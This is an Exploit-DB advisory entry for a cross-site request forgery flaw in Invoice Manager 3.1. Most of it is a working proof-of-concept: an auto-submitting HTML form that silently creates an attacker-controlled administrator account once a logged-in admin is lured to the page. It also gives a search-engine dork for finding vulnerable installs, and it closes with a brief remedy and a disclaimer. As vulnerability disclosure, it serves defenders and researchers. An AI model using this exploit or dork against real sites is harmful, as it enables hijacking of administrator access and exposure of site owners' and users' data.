Invoice Manager 3.1 – Cross-Site Request Forgery (Add Admin)

  • 作者: Ali BawazeEer
    日期: 2017-08-30
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/42592/
  • # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
    
    <!-- 
    # Exploit Title: Invoice Manager v3.1 - Cross site request forgery (Add Admin)
    # Exploit Author: Ali BawazeEer || https://sa.linkedin.com/in/alibawazeeer
    # Dork: inurl:controller=pjAdmin
    # Date: 30.08.2017
    # Homepage: https://www.phpjabbers.com/invoice-manager/
    # Software Demo Link: http://demo.phpjabbers.com/1504048815_513/index.php?controller=pjAdmin&action=pjActionLogin
    # Version: 3.1
    # Category: Webapps /php 
    # Tested on: mozila firefox 
    # 
    #
    -->
    
    # ========================================================
    #
    #
    # Invoice Manager v3.1 Cross site request forgery (Add Admin)
    # 
    # Description : Invoice Manager v3.1 is vulnerable to CSRF attack (No CSRF token in place) which if an admin user can be
    # tricked to visit a crafted URL created by attacker (via spear phishing/social engineering).
    # Once exploited, the attacker can login as the admin using the email and the password in the below exploit.
    #
    #
    # ======================CSRF POC (Adding New user with Administrator Privileges)==================================
    
    
    <html>
    <body>
    <form name="csrf_form" action="http://localhost/invoice/index.php?controller=pjAdminUsers&action=pjActionCreate" method="post">
    
    <input name="user_create" id="user_create" value="1" type="hidden">
    <input name="role_id" id="role_id" value="1" type="hidden" >
    <input name="email" id="email" value="AliBawazeEer@localhost.com" type="hidden">
    <input name="password" id="password" value="12341234" type="hidden">
    <input name="name" id="name" value="Ali BawazeEer" type="hidden">
    <input name="phone" id="phone" value="911911911" type="hidden">
    <input name="status" id="status" value="T" type="hidden">
    <script type="text/javascript">document.csrf_form.submit();</script>
    </body>
    </html>
    
    # =================================================EOF =======================================================
    #
    #
    # Risk : attackers are able to gain full access to the administrator panel after chaning the password for the admin
    # and thus have total control over the web application, including content change,and change user's account download backup of the site access to user's data..
    #
    #
    # Remedy : developer should implement CSRF token for each request
    #
    #
    #
    # ========================================================
    # [+] Disclaimer
    #
    # Permission is hereby granted for the redistribution of this advisory,
    # provided that it is not altered except by reformatting it, and that due
    # credit is given. Permission is explicitly given for insertion in
    # vulnerability databases and similar, provided that due credit is given to
    # the author. The author is not responsible for any misuse of the information contained 
    # herein and prohibits any malicious use of all security related information
    # or exploits by the author or elsewhere.
    #
    #
    # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #